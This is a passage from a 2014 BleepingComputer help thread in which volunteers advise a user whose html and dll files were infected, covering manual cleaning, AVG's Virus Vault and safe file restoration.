PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\update.css, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
 
Physical Sectors: 0
(No malicious items detected)
 
 
(end)

Edited by jsutbee, 11 August 2014 - 12:43 AM.


#12 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,079 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:The Arctic Circle
  • Local time:05:54 AM

Posted 11 August 2014 - 02:20 PM

Hi jsutbee,

 

Hmm, that is a lot. The only way to clean these files is really to open them up in notepad or similar and remove the infected part (I suggest turning off AVG whilst doing so, as it may try to delete the files), make sure to not run the files. .php and .py files will be unaffected by the virus.

 

xXToffeeXx~


~If I am helping you and you have not had a reply from me in two days, please send me a PM~

 

logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic] - If we have helped you out and you want to support what we do, you can do so here

 

 ~Twitter~ | ~Malware Analyst at Emsisoft~


#13 myrti

myrti

    Sillyberry


  • Malware Study Hall Admin
  • 33,771 posts
  • ONLINE
  •  
  • Gender:Female
  • Location:At home
  • Local time:06:54 AM

Posted 18 August 2014 - 03:27 PM

Hi,

 

are you still around? Have you found a way to clean the files?

 

regards

myrti


is that a bird?  a plane? nooo it's the flying blueberry!

If I have been helping you and haven't replied in 2 days, feel free to shoot me a PM! Please don't send help request via PM, unless I am already helping you. Use the forums!

 

Follow BleepingComputer on: Facebook | Twitter | Google+


#14 jsutbee

jsutbee
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:11:39 AM

Posted 18 August 2014 - 11:24 PM

HI myrti,

Thanks for your kind response.

Unfortunately, all my infected html and .dll files were deleted by AVG antivirus. I think there is still few infected files and whenever i try to access it, avg prompts to delete and and i have no any other option than to clean/delete from my system. I recovered lots of html files from my svn server and also re-installed few software to locate its dll files. Well i can use my pc as before but i have lost lots of files :( .
 



#15 myrti

myrti

    Sillyberry


  • Malware Study Hall Admin
  • 33,771 posts
  • ONLINE
  •  
  • Gender:Female
  • Location:At home
  • Local time:06:54 AM

Posted 19 August 2014 - 04:20 AM

Hi,

 

there is a chance that AVG only quarantined the files instead of deleting them. Have a look in the virus vault: Open the AVG program and in the History menu, open Virus Vault.

 

However be careful with restoring the files. Do not restore them to their original position, because they might be executed again and reinfect you. It's better to restore the files to your Desktop or somewhere where you are sure noone will accidentally click and launch them.

 

regards

myrti


is that a bird?  a plane? nooo it's the flying blueberry!

If I have been helping you and haven't replied in 2 days, feel free to shoot me a PM! Please don't send help request via PM, unless I am already helping you. Use the forums!

 

Follow BleepingComputer on: Facebook | Twitter | Google+





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users